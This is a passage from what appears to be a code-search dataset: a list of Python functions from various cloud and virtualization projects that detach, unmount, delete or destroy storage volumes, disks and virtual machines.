self.unmount(mount_point)\n if detach:\n log.debug(\"Detaching volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if self.detach():\n log.debug(\"Detached volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if ((self.static and (ServiceRole.GALAXY_DATA not in self.fs.svc_roles))\n or delete_vols):\n log.debug(\"Deleting volume {0} as part of {1} removal\".format(\n self.volume_id, self.fs.get_full_name()))\n self.delete()\n else:\n log.debug(\"Unmounted {0} but was instructed not to detach volume {1}\"\n .format(self.fs.get_full_name(), self.volume_id))", "def disk_detach(vmdk_path, vm):\n\n device = findDeviceByPath(vmdk_path, vm)\n\n if not device:\n # Could happen if the disk attached to a different VM - attach fails\n # and docker will insist to sending \"unmount/detach\" which also fails.\n msg = \"*** Detach failed: disk={0} not found. VM={1}\".format(\n vmdk_path, vm.config.uuid)\n logging.warning(msg)\n return err(msg)\n\n spec = vim.vm.ConfigSpec()\n dev_changes = []\n\n disk_spec = vim.vm.device.VirtualDeviceSpec()\n disk_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.remove\n disk_spec.device = device\n dev_changes.append(disk_spec)\n spec.deviceChange = dev_changes\n\n try:\n wait_for_tasks(si, [vm.ReconfigVM_Task(spec=spec)])\n except vim.fault.GenericVmConfigFault as ex:\n for f in ex.faultMessage:\n logging.warning(f.message)\n return err(\"Failed to detach \" + vmdk_path)\n\n setStatusDetached(vmdk_path)\n logging.info(\"Disk detached %s\", vmdk_path)\n return None", "def destroy(self):\r\n\r\n return self.driver.destroy_volume(volume=self)", "def detach(self, storages):\n self.tracer.info(\"%s.attach method called\" % self.__class__.__name__)\n\n # init variables & arrays\n all_pds = []\n all_vgs = []\n unmount_err = 0\n\n # reload global.ini\n self._cfg.reload()\n\n # connect to Google API\n conn = self.api_conn()\n\n # fetch the GCE zone for this host\n zone = self.get_zone(conn, HOSTNAME)\n\n for storage in storages:\n # fetch pd & dev variables for specified partition & usage\n connectionData = self._getConnectionDataForLun(storage.get(\"partition\"), storage.get(\"usage_type\"))\n try:\n pd = connectionData[\"pd\"]\n dev = connectionData[\"dev\"]\n except:\n raise Exception(\"pd or dev not set in global.ini\")\n\n # fetch the host which currently owns the disk & the file path\n path = storage.get(\"path\")\n\n # try to unmount the file system twice\n self._forcedUnmount(dev, path, 2)\n\n # if it's still mounted, try killing blocking processes and umount again\n if os.path.ismount(path):\n self._lsof_and_kill(path)\n self._forcedUnmount(dev, path, 2)\n\n # if still mounted, raise exception. The taking over node will stonith this host\n if os.path.ismount(path):\n self.tracer.warning(\"A PID belonging to someone other than SIDADM is blocking the unmount. This node will be fenced\")\n self._umount(path, lazy=True)\n mount_err = 1\n\n # add to list of devices.\n all_pds.append(pd)\n\n # check to see if the device is a VG. If so, add it to the list of VG's\n all_vgs.append(self.get_vg(dev))\n\n # Stop each unique VG\n all_vgs = list(set(all_vgs))\n for vg in all_vgs:\n Helper._runOsCommand(\"sudo /sbin/vgchange -an %s\" % vg, self.tracer)\n self.tracer.info(\"stopping volume group %s\" % (vg))\n\n # for each unique disk detected, detach it using Google API's\n all_pds = list(set(all_pds))\n for pd_member in all_pds:\n self.detach_pd(conn, HOSTNAME, pd_member)\n\n # if there was an error unmounting, self fence\n if unmount_err == 1:\n self.fence(conn, pdhost)\n\n # tell HANA we successfully detached\n return 0", "def detach(self):\n raise io.UnsupportedOperation", "def detach_pd(self, conn, host, pd):\n zone = self.get_zone(conn, host)\n pdhost = self.get_pd_host(conn, pd, zone)\n if pdhost == \"\":\n self.tracer.info(\n \"disk %s is already attached to %s(%s)\" % (pd, host, zone))\n elif pdhost == host:\n self.tracer.info(\"attempting to detach %s from %s(%s)\" % (pd, host, zone))\n operation = conn.instances().detachDisk(project=PROJECT, zone=zone, instance=host, deviceName=pd).execute()\n self.wait_for_operation(conn, operation, zone)\n if self.get_pd_host(conn, pd, zone) == \"\":\n self.tracer.info(\"successfully detached %s from %s(%s)\" % (pd, host, zone))", "def detach_disk_from_vm(self, vm_ref, instance_name, device):\n client_factory = self._session._get_vim().client.factory\n vmdk_detach_config_spec = vm_util.get_vmdk_detach_config_spec(\n client_factory, device)\n disk_key = device.key\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_detach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to detach \"\n \"disk %(disk_key)s\") % locals())", "def delete_volume(self, volume):\n nfs_share = volume.get('provider_location')\n if nfs_share:\n nms = self.share2nms[nfs_share]\n vol, parent_folder = self._get_share_datasets(nfs_share)\n folder = '%s/%s/%s' % (vol, parent_folder, volume['name'])\n mount_path = self.remote_path(volume).strip(\n '/%s' % self.VOLUME_FILE_NAME)\n if mount_path in self._remotefsclient._read_mounts():\n cinder.privsep.fs.umount(mount_path)\n try:\n props = nms.folder.get_child_props(folder, 'origin') or {}\n nms.folder.destroy(folder, '-r')\n except utils.NexentaException as exc:\n if 'does not exist' in exc.args[0]:\n LOG.info('Folder %s does not exist, it was '\n 'already deleted.', folder)\n return\n raise\n self._get_capacity_info(nfs_share)\n origin = props.get('origin')\n if origin and self._is_clone_snapshot_name(origin):\n try:\n nms.snapshot.destroy(origin, '')\n except utils.NexentaException as exc:\n if 'does not exist' in exc.args[0]:\n LOG.info('Snapshot %s does not exist, it was '\n 'already deleted.', origin)\n return\n raise", "def detach_all_volumes(self):\n nova_connection = self.source_connection.get_nova_connection(self.source_region_name)\n loop = asyncio.get_event_loop()\n try:\n loop.run_until_complete(self.resource_manager.detach_all_volume(nova_connection))\n except:\n raise", "def _DetachDisk(self, idx, root, _):\n hotmsg = \"\"\n if self.op.hotplug:\n hotmsg = self._HotplugDevice(constants.HOTPLUG_ACTION_REMOVE,\n constants.HOTPLUG_TARGET_DISK,\n root, None, idx)\n\n # Always shutdown the disk before detaching.\n ShutdownInstanceDisks(self, self.instance, [root])\n\n # Rename detached disk.\n #\n # Transform logical_id from:\n # <file_storage_dir>/<instance_name>/<disk_name>\n # to\n # <file_storage_dir>/<disk_name>\n if root.dev_type in (constants.DT_FILE, constants.DT_SHARED_FILE):\n file_driver = root.logical_id[0]\n instance_path, disk_name = os.path.split(root.logical_id[1])\n new_path = os.path.join(os.path.dirname(instance_path), disk_name)\n new_logical_id = (file_driver, new_path)\n result = self.rpc.call_blockdev_rename(self.instance.primary_node,\n [(root, new_logical_id)])\n result.Raise(\"Failed before detach\")\n # Update logical_id\n self.cfg.SetDiskLogicalID(root.uuid, new_logical_id)\n\n # Remove disk from config\n self.cfg.DetachInstanceDisk(self.instance.uuid, root.uuid)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n return hotmsg", "def delete_volume(self, uid):\n try:\n volInfo = self.get_volume_info(uid)\n except SVCVolumeNotFound as ex:\n LOG.warn(_(\"No volume with UID %s found.\") % uid)\n # assume deleted if not found\n return\n\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n self.remove_fcmapping(uid)\n cmd = \"svctask rmvdisk -force %s\" % (volID)\n self._svc_command(cmd)", "def delete_volume(self, volume):\n LOG.debug('SPDK deleting volume %s', volume.name)\n\n self._delete_bdev(volume.name)", "def volume_delete_by_storage(context, storage_id):\n _volume_get_query(context).filter_by(storage_id=storage_id).delete()", "def delete(self):\r\n return self.connection.delete_volume(self.id)", "def clean(self):\n if self.__volume:\n try:\n if self.volume_active():\n cinder_utils.delete_volume(self._cinder, self.__volume)\n else:\n logger.warn('Timeout waiting to delete volume %s',\n self.__volume.name)\n except NotFound:\n pass\n\n try:\n if self.volume_deleted(block=True):\n logger.info(\n 'Volume has been properly deleted with name - %s',\n self.volume_settings.name)\n self.__vm = None\n else:\n logger.error(\n 'Volume not deleted within the timeout period of %s '\n 'seconds', VOLUME_DELETE_TIMEOUT)\n except Exception as e:\n logger.error(\n 'Unexpected error while checking VM instance status - %s',\n e)\n\n self.__volume = None\n\n super(self.__class__, self).clean()", "def delete(**_):\n\n volume_id = utils.get_external_resource_id_or_raise(\n 'delete EBS volume', ctx.instance)\n\n if _delete_external_volume():\n return\n\n ctx.logger.debug('Deleting EBS volume: {0}'.format(volume_id))\n\n if not _delete_volume(volume_id):\n return ctx.operation.retry(\n message='Failed to delete volume {0}.'\n .format(volume_id))\n\n utils.unassign_runtime_property_from_resource(\n constants.ZONE, ctx.instance)\n\n utils.unassign_runtime_property_from_resource(\n constants.EXTERNAL_RESOURCE_ID, ctx.instance)\n\n ctx.logger.info(\n 'Deleted EBS volume: {0}.'\n .format(volume_id))", "def umount(self, vol_name, mountpoint, instance):\n LOG.debug('_HostMountState.umount(vol_name=%(vol_name)s, '\n 'mountpoint=%(mountpoint)s) generation %(gen)s',\n {'vol_name': vol_name, 'mountpoint': mountpoint,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n try:\n mount.remove_attachment(vol_name, instance.uuid)\n except KeyError:\n LOG.warning(\"Request to remove attachment (%(vol_name)s from \"\n \"%(mountpoint)s, but we don't think it's in use.\",\n {'vol_name': vol_name, 'mountpoint': mountpoint},\n instance=instance)\n\n if not mount.in_use():\n mounted = os.path.ismount(mountpoint)\n\n if mounted:\n mounted = self._real_umount(mountpoint)\n\n # Delete our record entirely if it's unmounted\n if not mounted:\n del self.mountpoints[mountpoint]\n\n LOG.debug('_HostMountState.umount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def _detach_external_volume_or_instance():\n\n if not utils.use_external_resource(ctx.source.node.properties) \\\n or not utils.use_external_resource(\n ctx.target.node.properties):\n return False\n\n utils.unassign_runtime_property_from_resource(\n 'instance_id', ctx.source.instance)\n ctx.logger.info(\n 'Either instance or EBS volume is an external resource so not '\n 'performing detach operation.')\n return True", "def unassign_volume(VolumeId=None):\n pass", "def fusion_api_delete_storage_volume(self, name=None, uri=None, param='', api=None, headers=None):\n return self.volume.delete(name=name, uri=uri, param=param, api=api, headers=headers)", "def delete_volume(self, volume):\n vg_name = self.get_volume_group_name(volume.id)\n vol_name = self.get_volume_name(volume.id)\n try:\n if self._get_is_replica(volume.volume_type) and self.replica:\n self._delete_volume_replica(volume, vg_name, vol_name)\n\n LOG.debug(\"Searching and deleting volume: %s in K2.\", vol_name)\n vol_rs = self.client.search(\"volumes\", name=vol_name)\n if vol_rs.total != 0:\n vol_rs.hits[0].delete()\n LOG.debug(\"Searching and deleting vg: %s in K2.\", vg_name)\n vg_rs = self.client.search(\"volume_groups\", name=vg_name)\n if vg_rs.total != 0:\n vg_rs.hits[0].delete()\n except Exception as ex:\n LOG.exception(\"Deletion of volume %s failed.\", vol_name)\n raise KaminarioCinderDriverException(reason=ex)", "def delete_volume(self, context, volume_id, unmanage_only=False):\n context = context.elevated()\n\n volume_ref = self.db.volume_get(context, volume_id)\n\n if context.project_id != volume_ref['project_id']:\n project_id = volume_ref['project_id']\n else:\n project_id = context.project_id\n\n LOG.info(_(\"volume %s: deleting\"), volume_ref['id'])\n if volume_ref['attach_status'] == \"attached\":\n # Volume is still attached, need to detach first\n raise exception.VolumeAttached(volume_id=volume_id)\n\n self._notify_about_volume_usage(context, volume_ref, \"delete.start\")\n self._reset_stats()\n\n try:\n self._delete_cascaded_volume(context, volume_id)\n except Exception:\n LOG.exception(_(\"Failed to deleting volume\"))\n # Get reservations\n try:\n reserve_opts = {'volumes': -1, 'gigabytes': -volume_ref['size']}\n QUOTAS.add_volume_type_opts(context,\n reserve_opts,\n volume_ref.get('volume_type_id'))\n reservations = QUOTAS.reserve(context,\n project_id=project_id,\n **reserve_opts)\n except Exception:\n reservations = None\n LOG.exception(_(\"Failed to update usages deleting volume\"))\n\n # Delete glance metadata if it exists\n try:\n self.db.volume_glance_metadata_delete_by_volume(context, volume_id)\n LOG.debug(_(\"volume %s: glance metadata deleted\"),\n volume_ref['id'])\n except exception.GlanceMetadataNotFound:\n LOG.debug(_(\"no glance metadata found for volume %s\"),\n volume_ref['id'])\n\n self.db.volume_destroy(context, volume_id)\n LOG.info(_(\"volume %s: deleted successfully\"), volume_ref['id'])\n self._notify_about_volume_usage(context, volume_ref, \"delete.end\")\n\n # Commit the reservations\n if reservations:\n QUOTAS.commit(context, reservations, project_id=project_id)\n\n self.publish_service_capabilities(context)\n\n return True", "async def async_volume_down(self) -> None:\n await self._volumio.volume_down()", "def terminate_volumes(db, context, instance_id):\n volume_api = volume.API()\n for bdm in db.block_device_mapping_get_all_by_instance(context,\n instance_id):\n #LOG.debug(_(\"terminating bdm %s\") % bdm)\n if bdm['volume_id'] and bdm['delete_on_termination']:\n volume_api.delete(context, bdm['volume_id'])\n db.block_device_mapping_destroy(context, bdm['id'])", "def test_detach_volume_force(self, remove_mock, terminate_mock, exc_mock):\n connector = mock.Mock()\n connector.disconnect_volume.side_effect = Exception\n # TODO(geguileo): Remove this ExceptionChainer simulation once we\n # release OS-Brick version with it and bump min version.\n exc = exc_mock.ExceptionChainer.return_value\n exc.context.return_value.__enter__.return_value = exc\n exc.context.return_value.__exit__.return_value = True\n\n volume = {'id': fake.VOLUME_ID}\n attach_info = {'device': {},\n 'connector': connector,\n 'conn': {'data': {}, }}\n\n # TODO(geguileo): Change TypeError to ExceptionChainer once we release\n # OS-Brick version with it and bump min version.\n self.assertRaises(TypeError,\n self.volume.driver._detach_volume, self.context,\n attach_info, volume, {}, force=True)\n\n self.assertTrue(connector.disconnect_volume.called)\n self.assertTrue(remove_mock.called)\n self.assertTrue(terminate_mock.called)\n self.assertEqual(3, exc.context.call_count)", "def delete(self, volume_id):\n self.client().volumes.delete(volume_id)", "def remove_volume(self, instanceId):\n logging.info(\"Stopping FS container for instance %s\", instanceId)\n user, instance = _get_user_and_instance(self.girder_client, instanceId)\n\n if 'containerInfo' not in instance:\n logging.warning(\"No containerInfo for instance %s\", instanceId)\n return\n containerInfo = instance[\"containerInfo\"] # VALIDATE\n FSContainer.stop_container(containerInfo[\"fscontainerId\"])\n logging.info(\"FS container %s stopped\", containerInfo[\"fscontainerId\"])", "def delete(vmname, deldisk=True):\n\n dom = _conn.lookupByName(vmname)\n if dom.isActive():\n dom.destroy()\n infokeeper.update_status_vm(vmname, Instance.STATUS_POWER_OFF)\n dom.undefine()\n infokeeper.delete_vm(vmname)\n if deldisk:\n os.remove(os.path.join(base_disk_path, dom.name() + '.img'))\n return 'VM %s deleted' % vmname", "async def delete(self, job):\n # nothing to delete if it doesn't exist\n info = await self.middleware.call('gluster.volume.exists_and_started', CTDB_VOL_NAME)\n if not info['exists']:\n return\n\n # stop the gluster volume\n if info['started']:\n options = {'args': (CTDB_VOL_NAME,), 'kwargs': {'force': True}}\n job.set_progress(33, f'Stopping gluster volume {CTDB_VOL_NAME!r}')\n await self.middleware.call('gluster.method.run', volume.stop, options)\n\n # finally, we delete it\n job.set_progress(66, f'Deleting gluster volume {CTDB_VOL_NAME!r}')\n await self.middleware.call('gluster.method.run', volume.delete, {'args': (CTDB_VOL_NAME,)})\n job.set_progress(100, f'Successfully deleted {CTDB_VOL_NAME!r}')", "def umount(vol_name, mountpoint, instance):\n with __manager__.get_state() as mount_state:\n mount_state.umount(vol_name, mountpoint, instance)", "async def volume_down(self) -> None:\n return await self.relay(\"volume_down\")()", "async def volume_down(self) -> None:\n return await self.relay(\"volume_down\")()", "def remove():\n vbox = Vbox(env.vm_name)\n vbox.remove()", "def vm_deprovision(self, params: dict) -> Tuple[\"Status\", dict]:", "def destroy(self, log_level=''):\n # Get all the additional volumes and detach,delete.\n volumes = self.utils.get_volumes_with_tag(\n {'cluster_name': config.ENV_DATA['cluster_name']}\n )\n self.flexy_instance.destroy()\n self.utils.detach_and_delete_vols(volumes)", "def deregister_volume(VolumeId=None):\n pass", "def destroy_node(self):\n driver = self.driver\n driver.ex_detach_floating_ip_from_node(self.node, self.floating_ip)\n driver.destroy_node(self.node)\n sleep(15)\n for volume in self.volumes:\n driver.destroy_volume(volume)", "async def eject(self) -> None:\n await self.dbus.Drive.call_eject(UDISKS2_DEFAULT_OPTIONS)", "def delete_volume_deallocate(self, vol_id):\n try:\n if not self.module.check_mode:\n self.provisioning.deallocate_volume(vol_id)\n self.provisioning.delete_volume(vol_id)\n return True\n except Exception as e:\n error_msg = 'Delete volume %s failed with error %s ' \\\n % (vol_id, str(e))\n self.show_error_exit(msg=error_msg)", "def destroy(vm, env=''):\n local( main_dir + '/vagrant/bin/vm.sh destroy ' + str(vm) + ' ' + str(env) )", "def detach_from_s2_shared_target(self,\n shared_target,\n volumes,\n **ignore):\n action = const.ACTION_DETACH_FROM_S2_SHARED_TARGET\n valid_keys = [\n 'shared_target', 'volumes',\n ]\n body = filter_out_none(locals(), valid_keys)\n if not self.conn.req_checker.check_params(\n body,\n list_params=['volumes'],\n ):\n return None\n\n return self.conn.send_request(action, body)", "def unmount_volume(self, kwargs):\n\n exp_params = [('vol_name', is_string)]\n try:\n vol_name = check_arguments(exp_params, kwargs)\n self.check_volume_name(vol_name)\n except Exception as ex:\n return HttpErrorResponse(\"%s\" % ex)\n\n self.logger.info(\"Unmount operation starting up for volume '%s'\"\n % vol_name)\n\n try:\n self._unmount(vol_name)\n except Exception as e:\n self.logger.exception(\"Failed to unmount volume '%s'\" % vol_name)\n return HttpErrorResponse('Failed to unmount volume: ' + e.message)\n\n self.logger.info('Unmount operation completed')\n return HttpJsonResponse()", "def database_volume_delete(volume_uuid):\n db = database_get()\n session = db.session()\n query = session.query(model.Volume)\n query.filter(model.Volume.uuid == volume_uuid).delete()\n session.commit()", "def detach_error(self) -> \"VolumeError\":\n return typing.cast(\n \"VolumeError\",\n self._properties.get(\"detachError\"),\n )", "def delete(self):\n for lv in self.logical_volumes:\n self.delete_lv(lv_name=lv)\n\n super().delete()", "def do_delete_configured_volume(self, arg):\n args = self.parse_arguments(arg)\n if len(args) == 0:\n self.perror(\"No storage specified.\")\n return\n self.do_coroutine(self._localStorageRoutines.delete_configured_volume_routine(args[0]))", "def detach(self):\n raise NotImplementedError()", "def disconnect_disk_from_mgmt(self, vios_uuid, disk_name):\n raise NotImplementedError()", "def destroy_vm_vdis(name=None, session=None, call=None):\n if session is None:\n session = _get_session()\n ret = {}\n # get vm object\n vms = session.xenapi.VM.get_by_name_label(name)\n if len(vms) == 1:\n # read virtual block device (vdb)\n vbds = session.xenapi.VM.get_VBDs(vms[0])\n if vbds is not None:\n x = 0\n for vbd in vbds:\n vbd_record = session.xenapi.VBD.get_record(vbd)\n if vbd_record[\"VDI\"] != \"OpaqueRef:NULL\":\n # read vdi on vdb\n vdi_record = session.xenapi.VDI.get_record(vbd_record[\"VDI\"])\n if \"iso\" not in vdi_record[\"name_label\"]:\n session.xenapi.VDI.destroy(vbd_record[\"VDI\"])\n ret[\"vdi-{}\".format(x)] = vdi_record[\"name_label\"]\n x += 1\n return ret", "def tearDown(self):\n\n # stopping the volume\n g.log.info(\"Starting to Unmount Volume and Cleanup Volume\")\n ret = self.unmount_volume_and_cleanup_volume(mounts=self.mounts)\n if not ret:\n raise ExecutionError(\"Failed to Unmount Volume and Cleanup Volume\")\n g.log.info(\"Successful in Unmount Volume and Cleanup Volume\")\n\n # Calling GlusterBaseClass tearDown\n GlusterBaseClass.tearDown.im_func(self)", "def umount_root_vm(self):\n print \"demontage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"umount %s\" % self.rep_vhosts_vm)", "def terminate_connection(self, volume, connector, **kwargs):\n # TODO: Add support for force and other parameters\n if self.share_targets:\n self._locked_unmap_volume(volume, connector)\n LOG.info('Volume %s is no longer exported', volume.id)", "def destroy():\n # instance first\n old_vm = _existing.vm\n _destroy_resource('vm')\n if not dry and old_vm is not None:\n # Wait for instance to be fully terminated before carrying on or we will have\n # dependency issues.\n print('Waiting for instance to be terminated before deleting other resources...')\n old_vm.wait_until_terminated()\n time.sleep(1) # One would think that wait for terminated should be enough...\n\n _destroy_resource('disk')\n\n # detach before destroy\n _detach_vpc_igw(vpc=_existing.vpc, igw=_existing.igw)\n _destroy_resource('igw')\n\n # sg and sub before vpc\n _destroy_resource('sg')\n _destroy_resource('sub')\n\n _destroy_resource('vpc')", "def _cleanup_instance(self, instance):\n # 1 clean os disk vhd\n # vm = self._get_instance(instance.uuid)\n # os_blob_uri = vm.storage_profile.os_disk.vhd.uri\n # os_blob_name = instance.uuid\n disk_name = self._get_name_from_id(instance.uuid)\n try:\n self._delete_disk(disk_name)\n LOG.info(_LI(\"Delete instance's Volume\"), instance=instance)\n except Exception as e:\n LOG.warning(_LW(\"Unable to delete blob for instance\"\n \" %(instance_uuid)s in Azure because %(reason)s\"),\n dict(instance_uuid=instance.uuid,\n reason=six.text_type(e)))\n\n # 2 clean network interface\n try:\n async_vm_action = self.network.network_interfaces.delete(\n CONF.azure.resource_group, instance.uuid\n )\n async_vm_action.wait(CONF.azure.async_timeout)\n LOG.info(_LI(\"Delete instance's Interface\"), instance=instance)\n except Exception as e:\n LOG.warning(_LW(\"Unable to delete network interface for instance\"\n \" %(instance_uuid)s in Azure because %(reason)s\"),\n dict(instance_uuid=instance.uuid,\n reason=six.text_type(e)))", "def volume_down(self):\n self._remote.volume(int(self._volume * 60) - 2)", "def peer_detach(self):\n cmd = \"gluster peer detach %s\"%(self.server)\n if self.force is True:\n cmd = cmd + ' force'\n cmdlist = shlex.split(cmd)\n output = subprocess.Popen(cmdlist, stdout = subprocess.PIPE,\n stderr = subprocess.PIPE)\n # TODO: Do more extensive error check\n stdout = output.stdout.read()\n stderr = output.stderr.read()\n print json.dumps({\n \"Server detached\": self.server,\n \"Status\": stdout\n })", "def detach_entity(self, entity_id):\n attachment = getattr(self.entities[entity_id],\n self.attachment_system.system_id)\n if not attachment.is_root:\n self.attachment_system.detach_child(entity_id)", "def unmount(self, path=None, vm=None):\n os.system(f\"multipass unmount {vm}:{path}\")\n dict_result = self._get_mount_status(vm=vm)\n return dict_result", "def detachDiskFromMinipad(self , disk):\n return", "def unmap_volume(self, host_name, volume_name):\n cmd = \"svctask rmvdiskhostmap -host %s %s\" % \\\n (host_name, volume_name)\n self._svc_command(cmd)", "def remove_volume(self, oid, volume_id):\n path = '/servers/%s/os-volume_attachments/%s' % (oid, volume_id)\n res = self.client.call(path, 'DELETE', data='', \n token=self.manager.identity.token)\n self.logger.debug('Remove volume %s from server %s: %s' % \n (volume_id, oid, truncate(res)))\n return res[0]", "def update_volume_after_detach(self, info, vms):\n info[0]['AttachedToVm'] = vms\n if len(vms) == 0:\n info[0]['machine_path'] = None\n info[0]['State'] = 'available'\n info[0]['time'] = datetime.datetime.now()\n return info", "def cleanup(self, context, instance, network_info, block_device_info=None,\n destroy_disks=True):\n container_id = self._find_container_by_name(instance['name']).get('id')\n if not container_id:\n return\n self.docker.destroy_container(container_id)\n network.teardown_network(container_id)\n self.unplug_vifs(instance, network_info)", "def fusion_api_delete_storage_volume_template(self, name=None, uri=None, api=None, headers=None):\n return self.template.delete(name=name, uri=uri, api=api, headers=headers)", "def DetachLun(self, request, global_params=None):\n config = self.GetMethodConfig('DetachLun')\n return self._RunMethod(\n config, request, global_params=global_params)", "def test_aws_service_api_volume_delete(self):\n pass", "def purge_volume(self, volume_path, data_isolated=False):\n\n trash = os.path.join(self.volume_prefix, \"_deleting\")\n trashed_volume = os.path.join(trash, volume_path.volume_id)\n\n try:\n self.fs.stat(trashed_volume)\n except cephfs.ObjectNotFound:\n log.warning(\"Trying to purge volume '{0}' but it's already been purged\".format(\n trashed_volume))\n return\n\n def rmtree(root_path):\n log.debug(\"rmtree {0}\".format(root_path))\n dir_handle = self.fs.opendir(root_path)\n d = self.fs.readdir(dir_handle)\n while d:\n if d.d_name not in [\".\", \"..\"]:\n # Do not use os.path.join because it is sensitive\n # to string encoding, we just pass through dnames\n # as byte arrays\n d_full = \"{0}/{1}\".format(root_path, d.d_name)\n if d.is_dir():\n rmtree(d_full)\n else:\n self.fs.unlink(d_full)\n\n d = self.fs.readdir(dir_handle)\n self.fs.closedir(dir_handle)\n\n self.fs.rmdir(root_path)\n\n rmtree(trashed_volume)\n\n if data_isolated:\n pool_name = \"{0}{1}\".format(self.POOL_PREFIX, volume_path.volume_id)\n osd_map = self._rados_command(\"osd dump\", {})\n pool_id = self._get_pool_id(osd_map, pool_name)\n mds_map = self._rados_command(\"mds dump\", {})\n if pool_id in mds_map['data_pools']:\n self._rados_command(\"mds remove_data_pool\", {\n 'pool': pool_name\n })\n self._rados_command(\"osd pool delete\",\n {\n \"pool\": pool_name,\n \"pool2\": pool_name,\n \"sure\": \"--yes-i-really-really-mean-it\"\n })", "def DetachAttachRoot(self, zone = None):\n instances = self.tester.ec2.get_instances(state=\"stopped\",zone=zone)\n if len(instances) == 0:\n raise Exception(\"Did not find any stopped instances\"\n \" to detach/attach root\")\n for instance in instances:\n self.assertTrue(3 == len(instance.block_device_mapping),\n \"Did not find three BDM for the instance\")\n root_vol_id = instance.block_device_mapping[self.root_volume_path].volume_id\n self.detachVolumeByPath(instance, self.root_volume_path)\n self.detachVolumeByPath(instance, self.test_volume_1_path)\n instances = self.tester.ec2.get_instances(idstring=instance.id)\n if len(instances) != 1:\n raise Exception(\"Could not find the instance\")\n instance = instances[0]\n root_volume = self.tester.ec2.get_volumes(volume_id=root_vol_id)[0]\n self.volume = root_volume\n self.tester.ec2.attach_volume(instance, root_volume, self.root_volume_path)", "def remove_export(self, context, volume):\n if not self.share_targets:\n self._locked_unmap_volume(volume)\n LOG.info('Volume %s is no longer exported', volume.id)", "def down(\n context,\n user=get_local_user(),\n remote=False,\n instance=None,\n stack=None,\n images=\"all\",\n volumes=True,\n orphans=False,\n):\n command = f\"down --rmi {images}\"\n\n if volumes:\n command = f\"{command} --volumes\"\n\n if orphans:\n command = f\"{command} --remove-orphans\"\n\n run_command(context, user, remote, instance, stack, command)", "def volume_down(hass, entity_id=None):\n data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}\n\n hass.services.call(DOMAIN, SERVICE_VOLUME_DOWN, data)", "def eject(mountpoint=DMG_MOUNT, silent=False, dry_run=ARGS.dry_run):\n if not isinstance(mountpoint, Path):\n mountpoint = Path(mountpoint)\n\n cmd = ['/usr/bin/hdiutil', 'eject', str(mountpoint)]\n\n if not dry_run and not mountpoint.exists():\n LOG.warning('Cannot unmount {mountpoint} - it does not exist'.format(mountpoint=mountpoint))\n elif not dry_run and mountpoint.exists():\n _p = subprocess.run(cmd, capture_output=True, encoding='utf-8')\n LOG.debug('{cmd} ({returncode})'.format(cmd=' '.join([str(x) for x in cmd]), returncode=_p.returncode))\n\n if _p.returncode == 0:\n if not silent:\n LOG.info('Unmounted {mountpoint}'.format(mountpoint=mountpoint))\n else:\n LOG.debug('Error: '. _p.stderr.strip() if _p.stderr else _p.stdout.strip())\n elif ARGS.dry_run and not dry_run:\n LOG.warning('Unmount {mountpoint}'.format(mountpoint=mountpoint))", "def down():\n\n # Stop the program if no init has occurred.\n Vagrant.stop_if_not_init()\n\n # Run vagrant halt from the vagrant folder.\n command = [\"vagrant\", \"halt\"]\n cwd = Settings.devbox_folder\n try:\n result = subprocess.check_call(command, cwd=cwd)\n except subprocess.CalledProcessError:\n Utilities.log(\"Could not run 'vagrant halt'.\")\n exit(1)", "def _delete_image_volume(self,\n context: context.RequestContext,\n cache_entry: dict) -> None:\n volume = objects.Volume.get_by_id(context, cache_entry['volume_id'])\n\n # Delete will evict the cache entry.\n self.volume_api.delete(context, volume)", "def database_volume_snapshot_delete(volume_snapshot_uuid):\n db = database_get()\n session = db.session()\n query = session.query(model.VolumeSnapshot)\n query.filter(model.VolumeSnapshot.uuid == volume_snapshot_uuid).delete()\n session.commit()", "def unsetVolume(self):\n return _libsbml.Compartment_unsetVolume(self)", "def hfp_sp_detach(handle, sp_dn):\r\n\r\n sp = handle.query_dn(sp_dn)\r\n if sp is None:\r\n raise ValueError(\"sp does not exist.\")\r\n\r\n sp.host_fw_policy_name = \"\"\r\n handle.set_mo(sp)\r\n handle.commit()\r\n return sp", "def unmount(mount_point):\n # type: (str) -> None\n\n p = subprocess.Popen(['umount', mount_point], stderr=subprocess.PIPE)\n out, err = p.communicate()\n if p.returncode > 0:\n raise OSError(err)\n else:\n os.rmdir(mount_point)", "def UnlockVolume(self, uuid, passphrase):\n if not util.UuidIsValid(uuid):\n raise storage.InvalidUUIDError('Invalid UUID: ' + uuid)\n returncode, _, stderr = util.Exec(\n (DISKUTIL, 'apfs', 'unlockVolume', uuid, '-stdinpassphrase'),\n stdin=passphrase)\n if (returncode != 0 and\n 'volume is not locked' not in stderr and\n 'is already unlocked' not in stderr):\n raise storage.CouldNotUnlockError(\n 'Could not unlock volume (%s).' % returncode)", "def destroy():\n\n # Stop the program if no init has occurred.\n Vagrant.stop_if_not_init()\n\n # Run vagrant destroy from the vagrant folder.\n command = [\"vagrant\", \"destroy\"]\n cwd = Settings.devbox_folder\n try:\n result = subprocess.check_call(command, cwd=cwd)\n except subprocess.CalledProcessError:\n Utilities.log(\"Could not run 'vagrant destroy'.\")\n exit(1)" ]
